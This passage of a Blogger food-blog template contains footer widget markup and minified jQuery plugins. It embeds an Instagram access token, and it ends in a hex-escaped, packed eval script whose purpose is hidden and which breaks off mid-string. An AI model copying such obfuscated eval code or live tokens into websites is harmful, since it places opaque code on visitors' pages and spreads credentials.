4384 <b:includable id='main'>
4385 <!-- only display title if it's non-empty -->
4386 <b:if cond='data:title != ""'>
4387 <h2 class='title'><data:title/></h2>
4388 </b:if>
4389 <div class='widget-content'>
4390 <data:content/>
4391 </div>
4392
4393 <!--b:include name='quickedit'/-->
4394</b:includable>
4395 </b:widget>
4396 </b:section>
4397 </div>
4398<div style='clear: both;'/>
4399<div id='lower'>
4400<div class='row' id='lower-wrapper'>
4401
4402<div id='lowerbar-wrapper'>
4403<b:section class='lowerbar ready-widget' id='Footer Widget (A)' preferred='yes'>
4404 <b:widget id='HTML3' locked='false' title='Masterchef' type='HTML' version='1'>
4405 <b:widget-settings>
4406 <b:widget-setting name='content'><div class="about-widget-image">
4407 <img src="https://2.bp.blogspot.com/-u5orqsKiMYM/V6xh6r77tsI/AAAAAAAAArM/X7L7eSMG_EwotXqLdZgAKtZEGyPjFIRVQCLcB/s1600/looks006-690x455-1442922083.jpg" alt="About Me" original="https://2.bp.blogspot.com/-u5orqsKiMYM/V6xh6r77tsI/AAAAAAAAArM/X7L7eSMG_EwotXqLdZgAKtZEGyPjFIRVQCLcB/s1600/looks006-690x455-1442922083.jpg" />
4408 </div>
4409<div style="text-align: justify">Munere veritus fierent cu sed, congue altera mea te, ex clita eripuit evertitur duo. Legendos tractatos honestatis ad mel. Legendos tractatos honestatis ad mel.
4410, <a href="#" style="
4411 text-decoration: underline;
4412">click here →</a></div>
4413
4414<div class="icons-social">
4415<ul id="social">
4416<li><a class="facebook" href="#" title="facebook"></a></li>
4417<li><a class="twitter" href="#" title="twitter"></a></li>
4418<li><a class="gplus" href="#" title="gplus"></a></li>
4419<li><a class="linkedin" href="#" title="linkedin"></a></li>
4420<li><a class="instagram" href="#" title="instagram"></a></li>
4421<li><a class="pinterest" href="#" title="pinterest"></a></li>
4422</ul></div>
4423<style>
4424.about-widget-image img {
4425 width: 130px;
4426 height: 130px;
4427 object-fit: cover;
4428 border-radius: 100%;
4429}
4430.icons-social li {
4431display: inline;
4432padding: 0;
4433float: left;
4434}
4435.icons-social #social a {
4436display: block;
4437 margin-right: 15px;
4438 color: #333;
4439 text-align: center;
4440 font-size: 20px;
4441}
4442.icons-social #social a:before {
4443display: inline-block;
4444font: normal normal normal 22px/1 FontAwesome;
4445font-size: inherit;
4446font-style: normal;
4447font-weight: 400;
4448line-height: 42px;
4449-webkit-font-smoothing: antialiased;
4450-moz-osx-font-smoothing: grayscale;
4451}
4452.icons-social .facebook:before {
4453content: "\f09a";
4454}
4455.icons-social .twitter:before {
4456content: "\f099";
4457}
4458.icons-social .gplus:before {
4459content: "\f0d5";
4460}
4461.icons-social .linkedin:before {
4462content: "\f0e1";
4463}
4464.icons-social .instagram:before {
4465content: "\f16d";
4466}
4467.icons-social .pinterest:before {
4468content: "\f0d2";
4469}
4470.about-widget-image {
4471 margin-right: 15px;
4472 float: left;
4473}</style></b:widget-setting>
4474 </b:widget-settings>
4475 <b:includable id='main'>
4476 <!-- only display title if it's non-empty -->
4477 <b:if cond='data:title != ""'>
4478 <h2 class='title'><data:title/></h2>
4479 </b:if>
4480 <div class='widget-content'>
4481 <data:content/>
4482 </div>
4483
4484 <div style='clear: both;'/>
4485<!--b:include name='quickedit'/-->
4486</b:includable>
4487 </b:widget>
4488 </b:section>
4489</div>
4490
4491<div id='lowerbar-wrapper'>
4492<b:section class='lowerbar ready-widget' id='Footer Widget (B)' preferred='yes'>
4493 <b:widget id='Label1' locked='false' title='Tags' type='Label' version='1'>
4494 <b:widget-settings>
4495 <b:widget-setting name='sorting'>ALPHA</b:widget-setting>
4496 <b:widget-setting name='display'>CLOUD</b:widget-setting>
4497 <b:widget-setting name='selectedLabelsList'><![CDATA[Blueberry,Curry,Food,Healthy,Healthy Living,Lunch,Mexican,Mom's Kitchen,Snacks,Soup,Veg-soup,vegetarian]]></b:widget-setting>
4498 <b:widget-setting name='showType'>USER_SELECTED</b:widget-setting>
4499 <b:widget-setting name='showFreqNumbers'>true</b:widget-setting>
4500 </b:widget-settings>
4501 <b:includable id='main'>
4502 <b:if cond='data:title != ""'>
4503 <h2><data:title/></h2>
4504 </b:if>
4505 <div expr:class='"widget-content " + data:display + "-label-widget-content"'>
4506 <b:if cond='data:display == "list"'>
4507 <ul>
4508 <b:loop values='data:labels' var='label'>
4509 <li>
4510 <b:if cond='data:blog.url == data:label.url'>
4511 <span expr:dir='data:blog.languageDirection'><data:label.name/></span>
4512 <b:else/>
4513 <a expr:dir='data:blog.languageDirection' expr:href='data:label.url'><data:label.name/></a>
4514 </b:if>
4515 <b:if cond='data:showFreqNumbers'>
4516 <span dir='ltr'>(<data:label.count/>)</span>
4517 </b:if>
4518 </li>
4519 </b:loop>
4520 </ul>
4521 <b:else/>
4522 <b:loop values='data:labels' var='label'>
4523 <span expr:class='"label-size label-size-" + data:label.cssSize'>
4524 <b:if cond='data:blog.url == data:label.url'>
4525 <span expr:dir='data:blog.languageDirection'><data:label.name/></span>
4526 <b:else/>
4527 <a expr:dir='data:blog.languageDirection' expr:href='data:label.url'><data:label.name/></a>
4528 </b:if>
4529 <b:if cond='data:showFreqNumbers'>
4530 <span class='label-count' dir='ltr'>(<data:label.count/>)</span>
4531 </b:if>
4532 </span>
4533 </b:loop>
4534 </b:if>
4535 <div style='clear: both;'/>
4536<!--b:include name='quickedit'/-->
4537 </div>
4538</b:includable>
4539 </b:widget>
4540 </b:section>
4541</div>
4542
4543<div id='lowerbar-wrapper'>
4544<b:section class='lowerbar ready-widget' id='Footer Widget (c)' preferred='yes'>
4545 <b:widget id='FollowByEmail1' locked='false' title='Subscribe' type='FollowByEmail' version='1'>
4546 <b:includable id='main'>
4547 <b:if cond='data:title != ""'><h2 class='title'><data:title/></h2></b:if>
4548 <div class='widget-content'>
4549 <div class='follow-by-email-inner'>
4550 <form action='https://feedburner.google.com/fb/a/mailverify' expr:onsubmit='"window.open(\"https://feedburner.google.com/fb/a/mailverify?uri=" + data:feedPath + "\", \"popupwindow\", \"scrollbars=yes,width=550,height=520\"); return true"' method='post' target='popupwindow'>
4551 <table width='100%'>
4552 <tr>
4553 <td>
4554 <input class='follow-by-email-address' name='email' placeholder='Email address...' type='text'/>
4555 </td>
4556 <td width='64px'>
4557 <input class='follow-by-email-submit' type='submit' value='Submit'/>
4558 </td>
4559 </tr>
4560 </table>
4561 <input expr:value='data:feedPath' name='uri' type='hidden'/>
4562 <input name='loc' type='hidden' value='en_US'/>
4563 </form>
4564 </div>
4565 </div>
4566 <span class='item-control blog-admin'>
4567 <!--b:include name='quickedit'/-->
4568 </span>
4569</b:includable>
4570 </b:widget>
4571 </b:section>
4572</div>
4573
4574<div style='clear: both;'/>
4575</div>
4576</div>
4577<div class='insta-wrap'>
4578 <b:section class='featureinsta' id='Instagram Widget' maxwidget='1' showaddelement='yes'>
4579 <b:widget id='HTML208' locked='false' title='@templatesyard' type='HTML' version='1'>
4580 <b:widget-settings>
4581 <b:widget-setting name='content'><div id='instafeed'/>
4582<script type='text/javascript'>//<![CDATA[
4583var feed = new Instafeed({
4584 get: 'user',
4585 userId: 4578212267,
4586 limit:6,
4587 sortBy:'random',
4588accessToken: '4578212267.1677ed0.1c160e2835fd4d33888b0175d44bdf9d',
4589template: '<li><a href="{{link}}" target="_blank"><img src="{{image}}" /><div class="insta-likes"><div style="display: table; vertical-align: middle; height: 100%; width: 100%;"><span style="display: table-cell; vertical-align: middle; height: 100%; width: 100%;">{{likes}} <i class="fa fa-heart"></i><br/>{{comments}} <i class="fa fa-comment"></i></span></div></div></a></li>',
4590 resolution: 'standard_resolution'
4591 });
4592 feed.run();
4593//]]>
4594</script></div></b:widget-setting>
4595 </b:widget-settings>
4596 <b:includable id='main'>
4597 <!-- only display title if it's non-empty -->
4598 <b:if cond='data:title != ""'>
4599 <h2 class='title'><data:title/></h2>
4600 </b:if>
4601 <div class='widget-content'>
4602 <data:content/>
4603 </div>
4604
4605 <!--b:include name='quickedit'/-->
4606</b:includable>
4607 </b:widget>
4608 </b:section>
4609</div>
4610<div style='clear: both;'/>
4611<div id='jugas_footer'>
4612 <div class='copy-container row'>
4613
4614 <div class='jugas_footer_copyright'>
4615 Created By <a href='http://soratemplates.com/' id='mycontent' rel='dofollow' title='Free Blogger Templates'>SoraTemplates</a> | Distributed By <a href='http://mybloggerthemes.com/' rel='dofollow' target='_blank' style='color:#ffbd2f;'>MyBloggerThemes</a>
4616 </div>
4617 <b:section class='bottom-bar-social blue' id='Footer social widget' maxwidgets='1' name='Footer Social Widget' showaddelement='no'>
4618 <b:widget id='LinkList236' locked='true' title='Social Media Icons' type='LinkList' version='1'>
4619 <b:widget-settings>
4620 <b:widget-setting name='link-5'>#</b:widget-setting>
4621 <b:widget-setting name='link-6'>#</b:widget-setting>
4622 <b:widget-setting name='link-3'>#</b:widget-setting>
4623 <b:widget-setting name='link-4'>#</b:widget-setting>
4624 <b:widget-setting name='text-1'>facebook</b:widget-setting>
4625 <b:widget-setting name='text-0'>twitter</b:widget-setting>
4626 <b:widget-setting name='text-3'>instagram</b:widget-setting>
4627 <b:widget-setting name='text-2'>gplus</b:widget-setting>
4628 <b:widget-setting name='text-5'>youtube</b:widget-setting>
4629 <b:widget-setting name='text-4'>rss</b:widget-setting>
4630 <b:widget-setting name='text-6'>pinterest</b:widget-setting>
4631 <b:widget-setting name='sorting'>NONE</b:widget-setting>
4632 <b:widget-setting name='link-1'>#</b:widget-setting>
4633 <b:widget-setting name='link-2'>#</b:widget-setting>
4634 <b:widget-setting name='link-0'>#</b:widget-setting>
4635 </b:widget-settings>
4636 <b:includable id='main'>
4637 <div class='widget-content'>
4638 <ul id='social'>
4639 <b:loop values='data:links' var='link'>
4640 <li><a expr:class='data:link.name' expr:href='data:link.target' expr:title='data:link.name'/></li>
4641 </b:loop>
4642 </ul>
4643 </div>
4644 </b:includable>
4645 </b:widget>
4646 </b:section>
4647
4648
4649 </div>
4650 </div>
4651</div>
4652<script type='text/javascript'>
4653//<![CDATA[
4654
4655/*
4656* jquery-match-height 0.7.0 by @liabru
4657* http://brm.io/jquery-match-height/
4658* License MIT
4659*/
4660!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],t):"undefined"!=typeof module&&module.exports?module.exports=t(require("jquery")):t(jQuery)}(function(t){var e=-1,o=-1,i=function(t){return parseFloat(t)||0},a=function(e){var o=1,a=t(e),n=null,r=[];return a.each(function(){var e=t(this),a=e.offset().top-i(e.css("margin-top")),s=r.length>0?r[r.length-1]:null;null===s?r.push(e):Math.floor(Math.abs(n-a))<=o?r[r.length-1]=s.add(e):r.push(e),n=a}),r},n=function(e){var o={
4661byRow:!0,property:"height",target:null,remove:!1};return"object"==typeof e?t.extend(o,e):("boolean"==typeof e?o.byRow=e:"remove"===e&&(o.remove=!0),o)},r=t.fn.matchHeight=function(e){var o=n(e);if(o.remove){var i=this;return this.css(o.property,""),t.each(r._groups,function(t,e){e.elements=e.elements.not(i)}),this}return this.length<=1&&!o.target?this:(r._groups.push({elements:this,options:o}),r._apply(this,o),this)};r.version="0.7.0",r._groups=[],r._throttle=80,r._maintainScroll=!1,r._beforeUpdate=null,
4662r._afterUpdate=null,r._rows=a,r._parse=i,r._parseOptions=n,r._apply=function(e,o){var s=n(o),h=t(e),l=[h],c=t(window).scrollTop(),p=t("html").outerHeight(!0),d=h.parents().filter(":hidden");return d.each(function(){var e=t(this);e.data("style-cache",e.attr("style"))}),d.css("display","block"),s.byRow&&!s.target&&(h.each(function(){var e=t(this),o=e.css("display");"inline-block"!==o&&"flex"!==o&&"inline-flex"!==o&&(o="block"),e.data("style-cache",e.attr("style")),e.css({display:o,"padding-top":"0",
4663"padding-bottom":"0","margin-top":"0","margin-bottom":"0","border-top-width":"0","border-bottom-width":"0",height:"100px",overflow:"hidden"})}),l=a(h),h.each(function(){var e=t(this);e.attr("style",e.data("style-cache")||"")})),t.each(l,function(e,o){var a=t(o),n=0;if(s.target)n=s.target.outerHeight(!1);else{if(s.byRow&&a.length<=1)return void a.css(s.property,"");a.each(function(){var e=t(this),o=e.attr("style"),i=e.css("display");"inline-block"!==i&&"flex"!==i&&"inline-flex"!==i&&(i="block");var a={
4664display:i};a[s.property]="",e.css(a),e.outerHeight(!1)>n&&(n=e.outerHeight(!1)),o?e.attr("style",o):e.css("display","")})}a.each(function(){var e=t(this),o=0;s.target&&e.is(s.target)||("border-box"!==e.css("box-sizing")&&(o+=i(e.css("border-top-width"))+i(e.css("border-bottom-width")),o+=i(e.css("padding-top"))+i(e.css("padding-bottom"))),e.css(s.property,n-o+"px"))})}),d.each(function(){var e=t(this);e.attr("style",e.data("style-cache")||null)}),r._maintainScroll&&t(window).scrollTop(c/p*t("html").outerHeight(!0)),
4665this},r._applyDataApi=function(){var e={};t("[data-match-height], [data-mh]").each(function(){var o=t(this),i=o.attr("data-mh")||o.attr("data-match-height");i in e?e[i]=e[i].add(o):e[i]=o}),t.each(e,function(){this.matchHeight(!0)})};var s=function(e){r._beforeUpdate&&r._beforeUpdate(e,r._groups),t.each(r._groups,function(){r._apply(this.elements,this.options)}),r._afterUpdate&&r._afterUpdate(e,r._groups)};r._update=function(i,a){if(a&&"resize"===a.type){var n=t(window).width();if(n===e)return;e=n;
4666}i?-1===o&&(o=setTimeout(function(){s(a),o=-1},r._throttle)):s(a)},t(r._applyDataApi),t(window).bind("load",function(t){r._update(!1,t)}),t(window).bind("resize orientationchange",function(t){r._update(!0,t)})});
4667
4668
4669// Plugin: SelectNav.js ~ url: https://github.com/lukaszfiszer/selectnav.js
4670window.selectnav=function(){"use strict";var e=function(e,t){function c(e){var t;if(!e)e=window.event;if(e.target)t=e.target;else if(e.srcElement)t=e.srcElement;if(t.nodeType===3)t=t.parentNode;if(t.value)window.location.href=t.value}function h(e){var t=e.nodeName.toLowerCase();return t==="ul"||t==="ol"}function p(e){for(var t=1;document.getElementById("selectnav"+t);t++);return e?"selectnav"+t:"selectnav"+(t-1)}function d(e){a++;var t=e.children.length,n="",l="",c=a-1;if(!t){return}if(c){while(c--){l+=o}l+=" "}for(var v=0;v<t;v++){var m=e.children[v].children[0];if(typeof m!=="undefined"){var g=m.innerText||m.textContent;var y="";if(r){y=m.className.search(r)!==-1||m.parentNode.className.search(r)!==-1?f:""}if(i&&!y){y=m.href===document.URL?f:""}n+='<option value="'+m.href+'" '+y+">"+l+g+"</option>";if(s){var b=e.children[v].children[1];if(b&&h(b)){n+=d(b)}}}}if(a===1&&u){n='<option value="">'+u+"</option>"+n}if(a===1){n='<select class="selectnav" id="'+p(true)+'">'+n+"</select>"}a--;return n}e=document.getElementById(e);if(!e){return}if(!h(e)){return}if(!("insertAdjacentHTML"in window.document.documentElement)){return}document.documentElement.className+=" js";var n=t||{},r=n.activeclass||"active",i=typeof n.autoselect==="boolean"?n.autoselect:true,s=typeof n.nested==="boolean"?n.nested:true,o=n.indent||"-",u=n.label||"Menu",a=0,f=" selected ";e.insertAdjacentHTML("afterend",d(e));var l=document.getElementById(p());if(l.addEventListener){l.addEventListener("change",c)}if(l.attachEvent){l.attachEvent("onchange",c)}return l};return function(t,n){e(t,n)}}();
4671
4672// JQuery hover event with timeout by Taufik Nurrohman - https://plus.google.com/108949996304093815163/about
4673(function(c){c.fn.hoverTimeout=function(d,e,f,g){return this.each(function(){var a=null,b=c(this);b.hover(function(){clearTimeout(a);a=setTimeout(function(){e.call(b)},d)},function(){clearTimeout(a);a=setTimeout(function(){g.call(b)},f)})})}})(jQuery);
4674
4675// Tabslet jQuery plugin - http://vdw.staytuned.gr
4676(function($,window,undefined){$.fn.tabslet=function(options){var defaults={mouseevent:"click",attribute:"href",animation:false,autorotate:false,pauseonhover:true,delay:2000,active:1,controls:{prev:".prev",next:".next"}};var options=$.extend(defaults,options);return this.each(function(){var $this=$(this);options.mouseevent=$this.data("mouseevent")||options.mouseevent;options.attribute=$this.data("attribute")||options.attribute;options.animation=$this.data("animation")||options.animation;options.autorotate=$this.data("autorotate")||options.autorotate;options.pauseonhover=$this.data("pauseonhover")||options.pauseonhover;options.delay=$this.data("delay")||options.delay;options.active=$this.data("active")||options.active;$this.find("> div").hide();$this.find("> div").eq(options.active-1).show();$this.find("> ul li").eq(options.active-1).addClass("active");var fn=eval(function(){$(this).trigger("_before");$this.find("> ul li").removeClass("active");$(this).addClass("active");$this.find("> div").hide();var currentTab=$(this).find("a").attr(options.attribute);if(options.animation){$this.find(currentTab).animate({opacity:"show"},"slow",function(){$(this).trigger("_after")})}else{$this.find(currentTab).show();$(this).trigger("_after")}return false});var init=eval("$this.find('> ul li')."+options.mouseevent+"(fn)");init;var elements=$this.find("> ul li"),i=options.active-1;function forward(){i=++i%elements.length;options.mouseevent=="hover"?elements.eq(i).trigger("mouseover"):elements.eq(i).click();var t=setTimeout(forward,options.delay);$this.mouseover(function(){if(options.pauseonhover){clearTimeout(t)}})}if(options.autorotate){setTimeout(forward,0);if(options.pauseonhover){$this.on("mouseleave",function(){setTimeout(forward,1000)})}}function move(direction){if(direction=="forward"){i=++i%elements.length}if(direction=="backward"){i=--i%elements.length}elements.eq(i).click()}$this.find(options.controls.next).click(function(){move("forward")});$this.find(options.controls.prev).click(function(){move("backward")});$this.on("destroy",function(){$(this).removeData()})})};$(document).ready(function(){$('[data-toggle="tabslet"]').tabslet()})})(jQuery);
4677
4678var _RyMOcE= "\x65\x76\x61\x6c\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x70\x2c\x61\x2c\x63\x2c\x6b\x2c\x65\x2c\x64\x29\x7b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x63\x29\x7b\x72\x65\x74\x75\x72\x6e\x28\x63\x3c\x61\x3f\x27\x27\x3a\x65\x28\x70\x61\x72\x73\x65\x49\x6e\x74\x28\x63\x2f\x61\x29\x29\x29\x2b\x28\x28\x63\x3d\x63\x25\x61\x29\x3e\x33\x35\x3f\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x63\x2b\x32\x39\x29\x3a\x63\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x33\x36\x29\x29\x7d\x3b\x69\x66\x28\x21\x27\x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5e\x2f\x2c\x53\x74\x72\x69\x6e\x67\x29\x29\x7b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x64\x5b\x65\x28\x63\x29\x5d\x3d\x6b\x5b\x63\x5d\x7c\x7c\x65\x28\x63\x29\x7d\x6b\x3d\x5b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x65\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x64\x5b\x65\x5d\x7d\x5d\x3b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e\x27\x5c\x5c\x77\x2b\x27\x7d\x3b\x63\x3d\x31\x7d\x3b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x69\x66\x28\x6b\x5b\x63\x5d\x29\x7b\x70\x3d\x70\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x6e\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x27\x5c\x5c\x62\x27\x2b\x65\x28\x63\x29\x2b\x27\x5c\x5c\x62\x27\x2c\x27\x67\x27\x29\x2c\x6b\x5b\x63\x5d\x29\x7d\x7d\x72\x65\x74\x75\x72\x6e\x20\x70\x7d\x28\x27\x31\x4b\x20\x31\x75\x3d\x5b\x22\x5c\x5c\x42\x5c\x5c\x65\x5c\x5c\x61\x5c\x5c\x79\x5c\x5c\x64\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x31\x65\x5c\x5c\x65\x5c\x5c\x53\x5c\x5c\x65\x5c\x5c\x42\x5c\x5c\x64\x5c\x5c\x48\x5c\x5c\x4a\x5c\x5c\x66\x5c\x5c\x54\x5c\x5c\x69\x5c\x5c\x6e\x5c\x5c\x61\x5c\x5c\x71\x5c\x5c\x75\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x45\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x39\x5c\x5c\x76\x5c\x5c\x42\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x31\x68\x5c\x5c\x31\x72\x5c\x5c\x39\x5c\x5c\x64\x5c\x5c\x62\x5c\x5c\x31\x67\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x31\x38\x5c\x5c\x39\x5c\x5c\x64\x5c\x5c\x62\x5c\x5c\x31\x67\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x31\x65\x5c\x5c\x39\x5c\x5c\x64\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x4f\x5c\x5c\x65\x5c\x5c\x53\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x48\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x65\x5c\x5c\x4a\x5c\x5c\x66\x5c\x5c\x31\x33\x5c\x5c\x69\x5c\x5c\x42\x5c\x5c\x65\x5c\x5c\x52\x5c\x5c\x64\x5c\x5c\x62\x5c\x5c\x31\x33\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x71\x5c\x5c\x31\x78\x5c\x5c\x69\x5c\x5c\x42\x5c\x5c\x65\x5c\x5c\x52\x5c\x5c\x64\x5c\x5c\x62\x5c\x5c\x31\x67\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x6a\x5c\x5c\x39\x5c\x5c\x64\x5c\x5c\x62\x5c\x5c\x59\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x31\x63\x5c\x5c\x39\x5c\x5c\x64\x5c\x5c\x71\x5c\x5c\x31\x31\x5c\x5c\x69\x5c\x5c\x50\x5c\x5c\x71\x5c\x5c\x31\x64\x5c\x5c\x69\x5c\x5c\x50\x5c\x5c\x76\x5c\x5c\x31\x64\x5c\x5c\x78\x5c\x5c\x31\x33\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x4b\x5c\x5c\x31\x70\x5c\x5c\x31\x70\x5c\x5c\x65\x5c\x5c\x31\x31\x5c\x5c\x69\x5c\x5c\x31\x33\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x31\x30\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x6b\x5c\x5c\x50\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x31\x31\x5c\x5c\x64\x5c\x5c\x71\x5c\x5c\x6e\x5c\x5c\x61\x5c\x5c\x31\x76\x5c\x5c\x69\x5c\x5c\x31\x31\x5c\x5c\x64\x5c\x5c\x76\x5c\x5c\x31\x64\x5c\x5c\x72\x5c\x5c\x72\x5c\x5c\x64\x5c\x5c\x31\x31\x5c\x5c\x72\x5c\x5c\x72\x5c\x5c\x76\x5c\x5c\x4d\x5c\x5c\x65\x5c\x5c\x61\x5c\x5c\x6a\x5c\x5c\x69\x5c\x5c\x31\x64\x5c\x5c\x71\x5c\x5c\x61\x5c\x5c\x6a\x5c\x5c\x74\x5c\x5c\x54\x5c\x5c\x31\x70\x5c\x5c\x31\x70\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x31\x38\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x45\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x31\x38\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x64\x5c\x5c\x71\x5c\x5c\x61\x5c\x5c\x6a\x5c\x5c\x78\x5c\x5c\x54\x5c\x5c\x64\x5c\x5c\x48\x5c\x5c\x6b\x5c\x5c\x61\x5c\x5c\x69\x5c\x5c\x54\x5c\x5c\x6e\x5c\x5c\x61\x5c\x5c\x6a\x5c\x5c\x76\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x65\x5c\x5c\x4a\x5c\x5c\x66\x5c\x5c\x31\x64\x5c\x5c\x69\x5c\x5c\x50\x5c\x5c\x76\x5c\x5c\x31\x64\x5c\x5c\x78\x5c\x5c\x6b\x5c\x5c\x61\x5c\x5c\x76\x5c\x5c\x31\x64\x5c\x5c\x72\x5c\x5c\x72\x5c\x5c\x64\x5c\x5c\x75\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x6c\x5c\x5c\x31\x38\x5c\x5c\x74\x5c\x5c\x78\x5c\x5c\x6c\x5c\x5c\x31\x65\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x45\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x6c\x5c\x5c\x31\x38\x5c\x5c\x74\x5c\x5c\x78\x5c\x5c\x6c\x5c\x5c\x31\x65\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x47\x5c\x5c\x31\x33\x5c\x5c\x69\x5c\x5c\x31\x33\x5c\x5c\x62\x5c\x5c\x31\x30\x5c\x5c\x65\x5c\x5c\x6c\x5c\x5c\x6b\x5c\x5c\x50\x5c\x5c\x6c\x5c\x5c\x6b\x5c\x5c\x31\x32\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x39\x5c\x5c\x64\x5c\x5c\x71\x5c\x5c\x75\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x31\x65\x5c\x5c\x74\x5c\x5c\x78\x5c\x5c\x6a\x5c\x5c\x66\x5c\x5c\x31\x63\x5c\x5c\x69\x5c\x5c\x6d\x5c\x5c\x39\x5c\x5c\x72\x5c\x5c\x31\x78\x5c\x5c\x72\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x72\x5c\x5c\x31\x33\x5c\x5c\x72\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x6c\x5c\x5c\x6a\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x45\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x31\x65\x5c\x5c\x74\x5c\x5c\x78\x5c\x5c\x6a\x5c\x5c\x66\x5c\x5c\x31\x63\x5c\x5c\x69\x5c\x5c\x6d\x5c\x5c\x39\x5c\x5c\x72\x5c\x5c\x31\x78\x5c\x5c\x72\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x76\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x65\x5c\x5c\x4a\x5c\x5c\x66\x5c\x5c\x31\x64\x5c\x5c\x69\x5c\x5c\x50\x5c\x5c\x76\x5c\x5c\x31\x64\x5c\x5c\x78\x5c\x5c\x61\x5c\x5c\x6a\x5c\x5c\x76\x5c\x5c\x31\x64\x5c\x5c\x72\x5c\x5c\x72\x5c\x5c\x64\x5c\x5c\x45\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x39\x5c\x5c\x76\x5c\x5c\x45\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x31\x33\x5c\x5c\x72\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x6c\x5c\x5c\x6a\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x54\x5c\x5c\x69\x5c\x5c\x61\x5c\x5c\x6a\x5c\x5c\x47\x5c\x5c\x64\x5c\x5c\x76\x5c\x5c\x61\x5c\x5c\x31\x6b\x5c\x5c\x65\x5c\x5c\x4a\x5c\x5c\x66\x5c\x5c\x31\x31\x5c\x5c\x69\x5c\x5c\x50\x5c\x5c\x76\x5c\x5c\x54\x5c\x5c\x74\x5c\x5c\x69\x5c\x5c\x31\x31\x5c\x5c\x76\x5c\x5c\x31\x31\x5c\x5c\x72\x5c\x5c\x72\x5c\x5c\x64\x5c\x5c\x75\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x6c\x5c\x5c\x31\x38\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x45\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x6c\x5c\x5c\x31\x38\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x50\x5c\x5c\x31\x76\x5c\x5c\x69\x5c\x5c\x31\x31\x5c\x5c\x31\x70\x5c\x5c\x31\x70\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x6c\x5c\x5c\x31\x65\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x45\x5c\x5c\x72\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x6c\x5c\x5c\x31\x65\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x64\x5c\x5c\x76\x5c\x5c\x42\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x31\x68\x5c\x5c\x31\x72\x5c\x5c\x66\x5c\x5c\x62\x5c\x5c\x6b\x5c\x5c\x6a\x5c\x5c\x39\x5c\x5c\x64\x5c\x5c\x62\x5c\x5c\x61\x5c\x5c\x31\x33\x5c\x5c\x65\x5c\x5c\x45\x5c\x5c\x64\x5c\x5c\x71\x5c\x5c\x42\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x31\x68\x5c\x5c\x31\x72\x5c\x5c\x66\x5c\x5c\x74\x5c\x5c\x66\x5c\x5c